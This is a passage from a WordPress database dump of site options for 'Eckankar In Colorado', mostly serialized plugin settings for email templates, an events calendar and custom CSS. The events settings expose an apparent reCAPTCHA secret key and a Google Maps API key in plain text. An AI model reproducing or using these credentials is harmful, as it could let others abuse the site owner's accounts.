'wp_mail_smtp_debug','a:0:{}','no'),(3058954,'wpins_block_notice','a:1:{s:16:\"disable-comments\";s:16:\"disable-comments\";}','yes'),(3059476,'haet_mail_options','a:7:{s:8:\"fromname\";s:20:\"Eckankar In Colorado\";s:11:\"fromaddress\";s:31:\"webmaster@eckankar-colorado.org\";s:14:\"disable_sender\";b:0;s:8:\"testmode\";b:0;s:18:\"testmode_recipient\";s:0:\"\";s:27:\"use_classic_template_editor\";b:0;s:27:\"user_checked_settings_in_v3\";b:1;}','yes'),(3059488,'haet_mail_theme_options','a:54:{s:10:\"background\";s:7:\"#ffffff\";s:17:\"contentbackground\";s:7:\"#f3f3f3\";s:10:\"headertext\";s:13:\"My Site title\";s:10:\"headerfont\";s:21:\"Trebuchet, sans-serif\";s:11:\"headeralign\";s:6:\"center\";s:14:\"headerfontsize\";s:2:\"21\";s:10:\"headerbold\";s:1:\"0\";s:12:\"headeritalic\";i:0;s:19:\"headertexttransform\";s:9:\"uppercase\";s:16:\"headerbackground\";s:7:\"#ffffff\";s:11:\"headercolor\";s:7:\"#595959\";s:16:\"headerpaddingtop\";s:2:\"50\";s:18:\"headerpaddingright\";i:0;s:19:\"headerpaddingbottom\";i:31;s:17:\"headerpaddingleft\";i:0;s:13:\"header_spacer\";i:10;s:19:\"headerimg_placement\";s:9:\"just_text\";s:9:\"headerimg\";s:0:\"\";s:15:\"headerimg_width\";s:3:\"600\";s:16:\"headerimg_height\";s:1:\"1\";s:13:\"headerimg_alt\";s:0:\"\";s:15:\"headerimg_align\";s:0:\"\";s:12:\"headlinefont\";s:21:\"Trebuchet, sans-serif\";s:13:\"headlinealign\";s:4:\"left\";s:16:\"headlinefontsize\";s:2:\"19\";s:12:\"headlinebold\";i:0;s:14:\"headlineitalic\";i:0;s:21:\"headlinetexttransform\";s:4:\"none\";s:13:\"headlinecolor\";s:7:\"#343434\";s:15:\"subheadlinefont\";s:21:\"Trebuchet, sans-serif\";s:16:\"subheadlinealign\";s:4:\"left\";s:19:\"subheadlinefontsize\";s:2:\"18\";s:15:\"subheadlinebold\";i:0;s:17:\"subheadlineitalic\";i:0;s:24:\"subheadlinetexttransform\";s:4:\"none\";s:16:\"subheadlinecolor\";s:7:\"#343434\";s:8:\"textfont\";s:28:\"Helvetica, Arial, sans-serif\";s:9:\"textalign\";s:4:\"left\";s:12:\"textfontsize\";i:14;s:8:\"textbold\";i:0;s:10:\"textitalic\";i:0;s:9:\"textcolor\";s:7:\"#878787\";s:9:\"linkcolor\";s:7:\"#777777\";s:8:\"linkbold\";i:0;s:10:\"linkitalic\";i:0;s:17:\"linktexttransform\";s:4:\"none\";s:13:\"linkunderline\";i:1;s:6:\"footer\";s:544:\"<p><span style=\"color: #595959;\"> </span></p>\n<p style=\"text-align: center;\"><span style=\"color: #808080; font-family: Helvetica, Arial, sans-serif;\"><span style=\"font-size: 12px;\">WordPress email template created with <a style=\"color: #808080;\" href=\"https://wordpress.org/plugins/wp-html-mail/\" target=\"_blank\" rel=\"noopener\">WP HTML Mail</a></span></span><br /><span style=\"font-size: 12px; font-family: Helvetica, Arial, sans-serif; color: #808080;\"><a style=\"color: #808080;\" href=\"http://www.acme-inc.com\">www.acme-inc.com</a></span></p>\";s:16:\"footerbackground\";s:7:\"#ffffff\";s:18:\"headertexttranform\";s:4:\"none\";s:20:\"headlinetexttranform\";s:4:\"none\";s:23:\"subheadlinetexttranform\";s:4:\"none\";s:16:\"linktexttranform\";s:4:\"none\";s:16:\"headerimg_notice\";s:242:\"Header image created with Canva. <a href=\'https://templates.wp-html-mail.com/static/travel/header.png\' download target=\'_blank\'>Download header PNG</a> or <a href=\'https://canva.7eqqol.net/LMBnY\' target=\'_blank\'>Edit header image in Canva</a>\";}','yes'),(3059489,'haet_mail_plugin_options','a:13:{s:14:\"contact-form-7\";a:2:{s:8:\"template\";i:1;s:6:\"sender\";i:0;}s:11:\"ninja-forms\";a:4:{s:8:\"template\";i:1;s:6:\"sender\";i:1;s:11:\"hide_header\";i:0;s:11:\"hide_footer\";i:0;}s:13:\"wp-e-commerce\";a:4:{s:8:\"template\";i:1;s:6:\"sender\";i:1;s:11:\"hide_header\";i:0;s:11:\"hide_footer\";i:0;}s:13:\"caldera-forms\";a:4:{s:8:\"template\";i:1;s:6:\"sender\";i:1;s:11:\"hide_header\";i:0;s:11:\"hide_footer\";i:0;}s:40:\"wp-support-plus-responsive-ticket-system\";a:4:{s:8:\"template\";i:1;s:6:\"sender\";i:1;s:11:\"hide_header\";i:0;s:11:\"hide_footer\";i:0;}s:15:\"birthday-emails\";a:4:{s:8:\"template\";i:1;s:6:\"sender\";i:1;s:11:\"hide_header\";i:0;s:11:\"hide_footer\";i:0;}s:12:\"gravityforms\";a:4:{s:8:\"template\";i:1;s:6:\"sender\";i:1;s:11:\"hide_header\";i:0;s:11:\"hide_footer\";i:0;}s:10:\"happyforms\";a:4:{s:8:\"template\";i:1;s:6:\"sender\";i:1;s:11:\"hide_header\";i:0;s:11:\"hide_footer\";i:0;}s:16:\"ultimate-wp-mail\";a:4:{s:8:\"template\";i:1;s:6:\"sender\";i:1;s:11:\"hide_header\";i:0;s:11:\"hide_footer\";i:0;}s:10:\"divi-theme\";a:4:{s:8:\"template\";i:1;s:6:\"sender\";i:1;s:11:\"hide_header\";i:0;s:11:\"hide_footer\";i:0;}s:10:\"woo-wallet\";a:4:{s:8:\"template\";i:1;s:6:\"sender\";i:1;s:11:\"hide_header\";i:0;s:11:\"hide_footer\";i:0;}s:10:\"formidable\";a:4:{s:8:\"template\";i:1;s:6:\"sender\";i:1;s:11:\"hide_header\";i:0;s:11:\"hide_footer\";i:0;}s:6:\"wpforo\";a:4:{s:8:\"template\";i:1;s:6:\"sender\";i:1;s:11:\"hide_header\";i:0;s:11:\"hide_footer\";i:0;}}','yes'),(3128494,'auto_update_core_dev','enabled','yes'),(3128495,'auto_update_core_minor','enabled','yes'),(3128496,'auto_update_core_major','unset','yes'),(3129205,'pum_total_conversion_count','2','yes'),(3252704,'rsssl_upgraded_to_four_dismissed','1','yes'),(3252827,'widget_boldgrid_component_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3252828,'widget_boldgrid_component_page_title','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3252829,'widget_boldgrid_component_site_title','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3252830,'widget_boldgrid_component_site_description','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3252831,'widget_boldgrid_component_logo','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3311092,'tribe_events_cat_children','a:0:{}','yes'),(3440136,'duplicate_post_show_link','a:1:{s:9:\"new_draft\";s:1:\"1\";}','yes'),(3440137,'duplicate_post_show_link_in','a:4:{s:3:\"row\";s:1:\"1\";s:8:\"adminbar\";s:1:\"1\";s:9:\"submitbox\";s:1:\"1\";s:11:\"bulkactions\";s:1:\"1\";}','yes'),(3622586,'folders_settings_updated','1','yes'),(3622587,'premio_folder_options','a:4:{s:17:\"customize_folders\";a:0:{}s:15:\"default_folders\";a:0:{}s:16:\"folders_settings\";a:1:{i:0;s:10:\"attachment\";}s:7:\"general\";a:2:{s:9:\"has_stars\";i:0;s:9:\"has_child\";i:1;}}','yes'),(3663286,'wp-optimize-installed-for','1613335513','yes'),(3866856,'rsssl_current_version','7.1.3','no'),(3866995,'https_detection_errors','a:0:{}','yes'),(3961633,'wfls_last_role_change','1699373455','no'),(3961957,'mec_options','a:12:{s:8:\"settings\";a:305:{s:24:\"multiple_day_show_method\";s:18:\"first_day_listgrid\";s:18:\"google_maps_status\";s:1:\"1\";s:20:\"export_module_status\";s:1:\"1\";s:2:\"sn\";a:14:{s:9:\"googlecal\";s:1:\"1\";s:4:\"ical\";s:1:\"1\";s:8:\"facebook\";s:1:\"1\";s:7:\"twitter\";s:1:\"1\";s:8:\"linkedin\";s:1:\"0\";s:2:\"vk\";s:1:\"0\";s:6:\"tumblr\";s:1:\"0\";s:9:\"pinterest\";s:1:\"0\";s:9:\"flipboard\";s:1:\"0\";s:6:\"pocket\";s:1:\"0\";s:6:\"reddit\";s:1:\"0\";s:8:\"whatsapp\";s:1:\"0\";s:8:\"telegram\";s:1:\"0\";s:5:\"email\";s:1:\"1\";}s:16:\"countdown_status\";s:1:\"0\";s:21:\"social_network_status\";s:1:\"1\";s:20:\"default_skin_archive\";s:13:\"full_calendar\";s:16:\"hide_time_method\";s:5:\"start\";s:24:\"remove_data_on_uninstall\";s:1:\"0\";s:11:\"date_suffix\";s:1:\"0\";s:6:\"schema\";s:1:\"1\";s:8:\"weekdays\";a:5:{i:0;s:1:\"1\";i:1;s:1:\"2\";i:2;s:1:\"3\";i:3;s:1:\"4\";i:4;s:1:\"5\";}s:8:\"weekends\";a:2:{i:0;s:1:\"7\";i:1;s:1:\"6\";}s:17:\"datepicker_format\";s:14:\"mm/dd/yy&m/d/Y\";s:13:\"midnight_hour\";s:1:\"0\";s:14:\"event_as_popup\";s:1:\"0\";s:11:\"sh_as_popup\";s:1:\"0\";s:21:\"include_image_in_feed\";s:1:\"1\";s:30:\"fallback_featured_image_status\";s:1:\"0\";s:19:\"booking_sender_name\";s:0:\"\";s:20:\"booking_sender_email\";s:0:\"\";s:25:\"booking_recipients_method\";s:3:\"BCC\";s:13:\"archive_title\";s:6:\"Events\";s:14:\"custom_archive\";s:0:\"\";s:25:\"monthly_view_archive_skin\";s:7:\"classic\";s:22:\"timetable_archive_skin\";s:6:\"modern\";s:17:\"list_archive_skin\";s:7:\"classic\";s:17:\"grid_archive_skin\";s:7:\"classic\";s:21:\"default_skin_category\";s:4:\"list\";s:23:\"custom_archive_category\";s:0:\"\";s:26:\"monthly_view_category_skin\";s:7:\"classic\";s:23:\"timetable_category_skin\";s:6:\"modern\";s:18:\"list_category_skin\";s:7:\"classic\";s:18:\"grid_category_skin\";s:7:\"classic\";s:22:\"category_events_method\";s:1:\"1\";s:14:\"archive_status\";s:1:\"1\";s:4:\"slug\";s:6:\"events\";s:13:\"category_slug\";s:12:\"mec-category\";s:8:\"currency\";s:1:\"$\";s:16:\"currency_symptom\";s:0:\"\";s:13:\"currency_sign\";s:6:\"before\";s:18:\"thousand_separator\";s:1:\",\";s:17:\"decimal_separator\";s:1:\".\";s:24:\"decimal_separator_status\";s:1:\"1\";s:23:\"google_recaptcha_status\";s:1:\"1\";s:20:\"google_recaptcha_fes\";s:1:\"1\";s:24:\"google_recaptcha_sitekey\";s:40:\"6LcydLsSAAAAAKY_OLZyhAIbgioGmuQM-HlwndQg\";s:26:\"google_recaptcha_secretkey\";s:40:\"6LcydLsSAAAAAGzYaNvLp5G-LL4zhoFVu5EafYGG\";s:11:\"time_format\";s:2:\"12\";s:13:\"fes_list_page\";s:0:\"\";s:13:\"fes_form_page\";s:0:\"\";s:20:\"fes_new_event_status\";s:0:\"\";s:24:\"fes_display_date_in_list\";s:1:\"0\";s:17:\"fes_thankyou_page\";s:0:\"\";s:21:\"fes_thankyou_page_url\";s:0:\"\";s:22:\"fes_thankyou_page_time\";s:4:\"2000\";s:17:\"fes_max_file_size\";s:4:\"5000\";s:16:\"fes_guest_status\";s:1:\"0\";s:20:\"fes_guest_name_email\";s:1:\"1\";s:23:\"fes_guest_user_creation\";s:1:\"0\";s:23:\"fes_section_data_fields\";s:1:\"0\";s:23:\"fes_section_event_links\";s:1:\"0\";s:16:\"fes_section_cost\";s:1:\"0\";s:26:\"fes_section_featured_image\";s:1:\"0\";s:22:\"fes_section_categories\";s:1:\"0\";s:18:\"fes_section_labels\";s:1:\"0\";s:32:\"fes_section_shortcode_visibility\";s:1:\"0\";s:23:\"fes_section_event_color\";s:1:\"0\";s:16:\"fes_section_tags\";s:1:\"0\";s:20:\"fes_section_location\";s:1:\"0\";s:21:\"fes_section_organizer\";s:1:\"0\";s:19:\"fes_section_speaker\";s:1:\"0\";s:27:\"fes_section_hourly_schedule\";s:1:\"0\";s:18:\"fes_section_schema\";s:1:\"0\";s:19:\"fes_section_excerpt\";s:1:\"0\";s:8:\"fes_note\";s:1:\"0\";s:19:\"fes_note_visibility\";s:6:\"always\";s:17:\"fes_required_body\";s:1:\"0\";s:20:\"fes_required_excerpt\";s:1:\"0\";s:17:\"fes_required_cost\";s:1:\"0\";s:23:\"fes_required_event_link\";s:1:\"0\";s:27:\"fes_required_more_info_link\";s:1:\"0\";s:21:\"fes_required_category\";s:1:\"0\";s:18:\"fes_required_label\";s:1:\"0\";s:20:\"userevents_shortcode\";s:6:\"264240\";s:20:\"search_bar_ajax_mode\";s:1:\"0\";s:22:\"search_bar_modern_type\";s:1:\"0\";s:19:\"search_bar_category\";s:1:\"0\";s:19:\"search_bar_location\";s:1:\"0\";s:20:\"search_bar_organizer\";s:1:\"0\";s:14:\"search_bar_tag\";s:1:\"0\";s:16:\"search_bar_label\";s:1:\"0\";s:21:\"search_bar_text_field\";s:1:\"0\";s:19:\"single_date_format1\";s:8:\"l, M d Y\";s:18:\"single_date_method\";s:8:\"referred\";s:19:\"single_single_style\";s:7:\"default\";s:12:\"tz_per_event\";s:1:\"0\";s:9:\"gutenberg\";s:1:\"1\";s:11:\"breadcrumbs\";s:1:\"0\";s:21:\"organizer_description\";s:1:\"0\";s:20:\"location_description\";s:1:\"0\";s:16:\"single_cost_type\";s:7:\"numeric\";s:28:\"display_event_fields_backend\";s:1:\"0\";s:20:\"display_event_fields\";s:1:\"0\";s:14:\"countdown_list\";s:7:\"default\";s:16:\"exceptional_days\";s:1:\"0\";s:21:\"additional_organizers\";s:1:\"1\";s:34:\"addintional_organizers_description\";s:1:\"0\";s:20:\"additional_locations\";s:1:\"0\";s:33:\"addintional_locations_description\";s:1:\"0\";s:14:\"related_events\";s:1:\"0\";s:31:\"related_events_basedon_category\";s:1:\"0\";s:32:\"related_events_basedon_organizer\";s:1:\"0\";s:31:\"related_events_basedon_location\";s:1:\"0\";s:28:\"related_events_basedon_label\";s:1:\"0\";s:26:\"related_events_basedon_tag\";s:1:\"0\";s:20:\"next_previous_events\";s:1:\"0\";s:29:\"next_previous_events_category\";s:1:\"0\";s:30:\"next_previous_events_organizer\";s:1:\"0\";s:29:\"next_previous_events_location\";s:1:\"0\";s:26:\"next_previous_events_label\";s:1:\"0\";s:24:\"next_previous_events_tag\";s:1:\"0\";s:22:\"per_occurrences_status\";s:1:\"1\";s:15:\"speakers_status\";s:1:\"0\";s:24:\"local_time_module_status\";s:1:\"0\";s:24:\"next_event_module_status\";s:1:\"0\";s:24:\"next_event_module_method\";s:10:\"occurrence\";s:32:\"next_event_module_multiple_count\";s:2:\"10\";s:30:\"next_event_module_date_format1\";s:5:\"M d Y\";s:10:\"tag_method\";s:8:\"post_tag\";s:24:\"google_recaptcha_booking\";s:1:\"1\";s:19:\"fes_section_booking\";s:1:\"1\";s:23:\"fes_section_booking_tbl\";s:1:\"1\";s:24:\"fes_section_booking_dpur\";s:1:\"1\";s:23:\"fes_section_booking_bao\";s:1:\"1\";s:22:\"fes_section_booking_io\";s:1:\"1\";s:22:\"fes_section_booking_aa\";s:1:\"1\";s:24:\"fes_section_booking_tubl\";s:1:\"1\";s:24:\"fes_section_booking_lftp\";s:1:\"1\";s:19:\"fes_section_tickets\";s:1:\"1\";s:20:\"fes_section_reg_form\";s:1:\"1\";s:16:\"fes_section_fees\";s:1:\"1\";s:29:\"fes_section_ticket_variations\";s:1:\"1\";s:13:\"mchimp_status\";s:1:\"0\";s:14:\"mchimp_api_key\";s:0:\"\";s:14:\"mchimp_list_id\";s:0:\"\";s:26:\"mchimp_subscription_status\";s:10:\"subscribed\";s:21:\"mchimp_segment_status\";s:1:\"0\";s:12:\"campm_status\";s:1:\"0\";s:13:\"campm_api_key\";s:0:\"\";s:13:\"campm_list_id\";s:0:\"\";s:17:\"mailerlite_status\";s:1:\"0\";s:18:\"mailerlite_api_key\";s:0:\"\";s:18:\"mailerlite_list_id\";s:0:\"\";s:22:\"constantcontact_status\";s:1:\"0\";s:23:\"constantcontact_api_key\";s:0:\"\";s:28:\"constantcontact_access_token\";s:0:\"\";s:22:\"active_campaign_status\";s:1:\"0\";s:23:\"active_campaign_api_url\";s:0:\"\";s:23:\"active_campaign_api_key\";s:0:\"\";s:23:\"active_campaign_list_id\";s:0:\"\";s:13:\"aweber_status\";s:1:\"0\";s:14:\"aweber_list_id\";s:0:\"\";s:15:\"mailpoet_status\";s:1:\"0\";s:14:\"sendfox_status\";s:1:\"0\";s:19:\"google_maps_api_key\";s:39:\"AIzaSyARWM6ucf41O8Q8niypaQ2FiUkg6ZUOlio\";s:21:\"google_maps_zoomlevel\";s:2:\"17\";s:17:\"google_maps_style\";s:0:\"\";s:32:\"google_maps_get_direction_status\";s:1:\"2\";s:24:\"google_maps_date_format1\";s:5:\"M d Y\";s:25:\"google_maps_dont_load_api\";s:1:\"0\";s:29:\"google_maps_fullscreen_button\";s:1:\"1\";s:20:\"qrcode_module_status\";s:1:\"0\";s:21:\"weather_module_status\";s:1:\"0\";s:25:\"weather_module_wa_api_key\";s:0:\"\";s:22:\"weather_module_api_key\";s:0:\"\";s:29:\"weather_module_imperial_units\";s:1:\"0\";s:34:\"weather_module_change_units_button\";s:1:\"0\";s:9:\"bp_status\";s:1:\"0\";s:19:\"bp_attendees_module\";s:1:\"0\";s:25:\"bp_attendees_module_limit\";s:2:\"20\";s:15:\"bp_add_activity\";s:1:\"0\";s:15:\"bp_profile_menu\";s:1:\"0\";s:9:\"ld_status\";s:1:\"0\";s:10:\"pmp_status\";s:1:\"0\";s:14:\"booking_status\";s:1:\"1\";s:20:\"booking_date_format1\";s:5:\"Y-m-d\";s:21:\"booking_maximum_dates\";s:1:\"1\";s:22:\"booking_date_selection\";s:8:\"dropdown\";s:26:\"show_booking_form_interval\";s:1:\"0\";s:24:\"cancellation_period_from\";s:0:\"\";s:24:\"cancellation_period_time\";s:0:\"\";s:21:\"cancellation_period_p\";s:4:\"hour\";s:24:\"cancellation_period_type\";s:6:\"before\";s:20:\"booking_registration\";s:1:\"0\";s:17:\"booking_user_role\";s:0:\"\";s:16:\"booking_userpass\";s:4:\"auto\";s:13:\"booking_limit\";s:1:\"0\";s:22:\"booking_ip_restriction\";s:1:\"0\";s:22:\"booking_lock_prefilled\";s:1:\"0\";s:35:\"booking_last_few_tickets_percentage\";s:3:\"100\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:21:\"booking_first_for_all\";s:1:\"1\";s:15:\"booking_invoice\";s:1:\"0\";s:15:\"booking_ongoing\";s:1:\"1\";s:24:\"downloadable_file_status\";s:1:\"0\";s:24:\"booking_auto_verify_free\";s:1:\"1\";s:24:\"booking_auto_verify_paid\";s:1:\"0\";s:25:\"booking_auto_confirm_free\";s:1:\"1\";s:25:\"booking_auto_confirm_paid\";s:1:\"0\";s:31:\"booking_auto_confirm_send_email\";s:1:\"1\";s:15:\"notif_per_event\";s:1:\"1\";s:22:\"assets_per_page_status\";s:1:\"0\";s:27:\"booking_private_description\";s:1:\"1\";s:22:\"fes_use_all_organizers\";s:1:\"1\";s:18:\"currency_per_event\";s:1:\"0\";s:14:\"coupons_status\";s:1:\"0\";s:17:\"taxes_fees_status\";s:1:\"0\";s:4:\"fees\";a:1:{s:3:\":i:\";a:3:{s:5:\"title\";s:0:\"\";s:6:\"amount\";s:0:\"\";s:4:\"type\";s:7:\"percent\";}}s:24:\"ticket_variations_status\";s:1:\"0\";s:17:\"ticket_variations\";a:1:{s:3:\":i:\";a:3:{s:5:\"title\";s:0:\"\";s:5:\"price\";s:0:\"\";s:3:\"max\";s:1:\"1\";}}s:23:\"upload_field_mime_types\";s:0:\"\";s:28:\"upload_field_max_upload_size\";s:0:\"\";s:17:\"archive_title_tag\";s:2:\"h1\";s:20:\"breadcrumbs_category\";s:1:\"0\";s:20:\"related_events_limit\";s:2:\"30\";s:26:\"export_module_hide_expired\";s:1:\"0\";s:36:\"countdown_disable_for_ongoing_events\";s:1:\"0\";s:9:\"ical_feed\";s:1:\"0\";s:23:\"fes_section_booking_typ\";s:1:\"1\";s:23:\"fes_section_booking_att\";s:1:\"1\";s:13:\"fes_agreement\";s:1:\"0\";s:21:\"fes_agreement_checked\";s:1:\"0\";s:18:\"fes_agreement_page\";s:0:\"\";s:19:\"booking_cancel_page\";s:0:\"\";s:24:\"booking_cancel_page_time\";s:4:\"2000\";s:22:\"booking_tid_gen_method\";s:6:\"random\";s:22:\"booking_tid_start_from\";s:5:\"10000\";s:18:\"booking_skip_step1\";s:1:\"1\";s:15:\"booking_wcb_all\";s:1:\"1\";s:22:\"booking_wcb_uram_guest\";s:1:\"1\";s:21:\"booking_wcb_organizer\";s:1:\"1\";s:22:\"booking_wcb_subscriber\";s:1:\"1\";s:23:\"booking_wcb_contributor\";s:1:\"1\";s:18:\"booking_wcb_author\";s:1:\"1\";s:18:\"booking_wcb_editor\";s:1:\"1\";s:25:\"booking_wcb_administrator\";s:1:\"1\";s:16:\"attendee_counter\";s:1:\"0\";s:20:\"disable_ticket_times\";s:1:\"0\";s:22:\"fees_disabled_gateways\";a:7:{i:1;s:1:\"0\";i:2;s:1:\"0\";i:3;s:1:\"0\";i:5;s:1:\"0\";i:7;s:1:\"0\";i:8;s:1:\"0\";i:6;s:1:\"0\";}s:28:\"ticket_variations_per_ticket\";s:1:\"0\";s:19:\"booking_auto_refund\";s:1:\"0\";s:15:\"mec_cart_status\";s:1:\"0\";s:9:\"cart_page\";s:0:\"\";s:13:\"checkout_page\";s:0:\"\";s:14:\"cart_after_add\";s:4:\"cart\";s:22:\"notif_template_disable\";s:1:\"0\";s:20:\"single_booking_style\";s:7:\"default\";s:22:\"featured_image_caption\";s:1:\"0\";s:14:\"sticky_sidebar\";s:1:\"0\";s:34:\"additional_locations_disable_title\";s:1:\"0\";s:31:\"related_events_display_expireds\";s:1:\"0\";s:23:\"fes_section_occurrences\";s:1:\"1\";s:25:\"auto_emails_module_status\";s:1:\"0\";s:22:\"public_download_module\";s:1:\"0\";s:20:\"remaining_time_label\";s:1:\"0\";s:15:\"style_per_event\";s:1:\"0\";s:22:\"fes_single_event_style\";s:0:\"\";s:17:\"event_fields_icon\";s:1:\"0\";s:35:\"addintional_organizers_social_links\";s:1:\"0\";s:24:\"related_events_per_event\";s:1:\"0\";s:12:\"ss_data_time\";s:1:\"1\";s:13:\"ss_local_time\";s:1:\"1\";s:13:\"ss_event_cost\";s:1:\"1\";s:12:\"ss_more_info\";s:1:\"1\";s:14:\"ss_event_label\";s:1:\"1\";s:17:\"ss_event_location\";s:1:\"1\";s:19:\"ss_event_categories\";s:1:\"1\";s:17:\"ss_event_orgnizer\";s:1:\"1\";s:17:\"ss_event_speakers\";s:1:\"1\";s:15:\"ss_register_btn\";s:1:\"1\";s:17:\"ss_attende_module\";s:1:\"1\";s:14:\"ss_next_module\";s:1:\"1\";s:15:\"ss_links_module\";s:1:\"1\";s:17:\"ss_weather_module\";s:1:\"1\";s:13:\"ss_google_map\";s:1:\"1\";s:16:\"ss_qrcode_module\";s:1:\"1\";s:25:\"ss_public_download_module\";s:1:\"1\";s:23:\"ss_custom_fields_module\";s:1:\"1\";s:10:\"faq_status\";s:1:\"0\";s:13:\"banner_status\";s:1:\"0\";s:18:\"trailer_url_status\";s:1:\"0\";s:15:\"sponsors_status\";s:1:\"0\";s:10:\"sms_status\";s:1:\"0\";s:22:\"sms_twilio_account_sid\";s:0:\"\";s:21:\"sms_twilio_auth_token\";s:0:\"\";s:24:\"sms_twilio_sender_number\";s:0:\"\";s:22:\"sms_notif_admin_status\";s:1:\"0\";s:26:\"sms_notif_admin_recipients\";s:0:\"\";s:20:\"sms_notif_admin_text\";s:0:\"\";s:19:\"progress_bar_status\";s:1:\"0\";s:20:\"event_gallery_status\";s:1:\"0\";s:25:\"weather_module_vs_api_key\";s:0:\"\";s:31:\"next_event_module_active_button\";s:1:\"0\";}s:6:\"styles\";a:1:{s:3:\"CSS\";s:3612:\" /* CANCELS THEME CALL - WITHOUT THIS A DUPLICATE FOOTER WILL DISPLAY ON ALL MEC SINGLE PAGES */\r\n.single-mec-events .main #footer,\r\n.single-mec-events .main .boldgrid-section {\r\n	display: none;\r\n}\r\n/* ALLOWS MEC EVENT DESCRIPTION TO BE SEEN AND DOES NOT INTERFERE WITH BLOCKING DUPLICATE FOOTER */\r\n.mec-single-event-description .boldgrid-section {\r\ndisplay: block !important;\r\n}\r\n\r\n\r\n /* CHANGES COLOR OF CALENDAR TABLE HEADER FOR MEC FULL CALENDAR */\r\n.mec-box-calendar.mec-calendar.mec-event-calendar-classic .mec-calendar-table-head dt {\r\n    background-color: #b4cfec;\r\n}\r\n\r\n.mec-calendar.mec-event-container-simple dl dt.mec-selected-day, .mec-calendar.mec-event-container-simple dl dt.mec-selected-day:hover {\r\n    border-bottom: 2px solid #3c92de;\r\n    background: #f7f7f7;\r\n}\r\n\r\n.mec-single-title {\r\n    color: #1D5791 !important;\r\n    font-weight: 400 !important;\r\n    line-height: 43px !important;\r\n}\r\n.mec-single-event .mec-event-social li.mec-event-social-icon a {\r\n    color: #fff !important;\r\n}\r\n /* DO NOT DISPLAY CATEGORIES ON SINGLE VIEW */\r\n.mec-single-event-category {\r\n   display:none;\r\n}\r\n /* DO NOT DISPLAY EVENT DATE ON SINGLE VIEW REGISTRATION FORM */\r\n.mec-book-first {\r\ndisplay: none;\r\n}\r\n /* DO NOT DISPLAY TICKETS AVAILABLE ON SINGLE VIEW REGISTRATION FORM */\r\n.mec-event-ticket-available {\r\ndisplay: none !important;\r\n}\r\n/* DO NOT DISPLAY TICKET COUNT ON SINGLE VIEW REGISTRATION FORM */\r\n.mec-book-ticket-limit {\r\ndisplay: none !important;\r\n}\r\n \r\n /* CHANGES FONT COLOR & FONT SIZE, FOR SIDE-PANEL REGISTER BUTTON ON SINGLE PAGE DISPLAY*/\r\n.mec-single-event .mec-booking-button {\r\n    border-bottom: none;\r\n    letter-spacing: .5px;\r\n    line-height: 48px;\r\n    height: 76px;\r\n    transition: all .5s ease;\r\n    color: #fff;\r\n    padding: 18px;\r\n    display: block;\r\n    text-align: center;\r\n    font-size: 18px !important;\r\n    border-radius: 2px;\r\n    box-shadow: 0 1px 2px rgb(0 0 0 / 15%);\r\n    background-color: #24ca4f !important;\r\n    color: #ffffff !important;\r\n}\r\n /* CHANGES HOVER COLOR FOR SIDE-PANEL REGISTER BUTTON ON SINGLE PAGE DISPLAY*/\r\n.mec-single-event .mec-event-export-module.mec-frontbox .mec-event-exporting .mec-export-details ul li a:hover {\r\n    color: #fff !important;\r\n}\r\n.mec-single-event .mec-booking-button:hover {\r\n    background-color: #bebcbc !important;\r\n\r\n/* HIDE EVENT STATUS LABELS - OTHERWISE IT WILL DISPLAY \\\'EXPIRED\\\' AND \\\'ONGOING\\\' */\r\n.mec-single-event .mec-holding-status {\r\ndisplay: none !important;\r\n}\r\n\r\n/* NOTE -----  FIX FOR THE SIDEBAR DISPLAY ERROR WHEN LOGGED IN AS AN ADMIN ARE IN EXTERNAL STYLE SHEET - WOULD NOT WORK FROM WITHIN THIS APPLICATION */\r\n\r\n/* NOTE ----- CAROUSEL EDITS ARE IN EXTERNAL STYLE SHEET - WOULD NOT WORK FROM WITHIN THIS APPLICATION */\r\n\r\n/* NOTE ----- MEC SINGLE PAGE HEADER REMOVAL EDITS ARE IN EXTERNAL STYLE SHEET - WOULD NOT WORK FROM WITHIN THIS APPLICATION */\r\n\r\n\r\n/* CHANGES TO MEC REGISTER BUTTON */\r\n.mec-booking-button .mec-bg-color .simple-booking  \r\n}\r\n.mec-single-event .mec-booking-button:hover {\r\n    background-color: # !important; \r\n} \r\n\r\n/* CHANGES FONTS IN BOOKING ATTENDEES FORM */\r\n.mec-event-ticket-name {\r\n     font-size: 26px !important;\r\n}\r\n.mec-event-ticket-description {\r\n    font-size: 20px !important;\r\n}\r\n/* CHANGES MARGIN AT BOTTOM OF EVENT DESCRIPTION */\r\n.mec-single-event .mec-events-content {\r\n    margin-bottom: 25px;\r\n}\r\n.mec-events-meta-group-booking .mec-booking-shortcode, .mec-single-event .mec-events-meta-group-booking, .mec-single-event .mec-frontbox {\r\n    margin-bottom: 30px;\r\n    padding: 27px;\r\n    background: #fff;\r\n    border: 1px solid #e6e7e8;\r\n}\";}s:8:\"gateways\";a:9:{i:1;a:5:{s:6:\"status\";s:1:\"1\";s:5:\"title\";s:0:\"\";s:7:\"comment\";s:23:\"Pay Locally Description\";s:5:\"index\";s:1:\"1\";s:25:\"disable_auto_confirmation\";s:1:\"0\";}i:2;a:6:{s:6:\"status\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:7:\"comment\";s:26:\"Paypal Express Description\";s:7:\"account\";s:0:\"\";s:4:\"mode\";s:4:\"live\";s:5:\"index\";s:1:\"2\";}i:3;a:8:{s:6:\"status\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:7:\"comment\";s:30:\"Paypal Credit Card Description\";s:12:\"api_username\";s:0:\"\";s:12:\"api_password\";s:0:\"\";s:13:\"api_signature\";s:0:\"\";s:4:\"mode\";s:4:\"live\";s:5:\"index\";s:1:\"3\";}i:5;a:7:{s:6:\"status\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:7:\"comment\";s:26:\"Stripe Gateway Description\";s:14:\"payment_method\";s:2:\"cc\";s:10:\"secret_key\";s:0:\"\";s:15:\"publishable_key\";s:0:\"\";s:5:\"index\";s:1:\"4\";}i:6;a:1:{s:6:\"status\";s:1:\"0\";}i:7;a:14:{s:6:\"status\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:7:\"comment\";s:26:\"Stripe Gateway 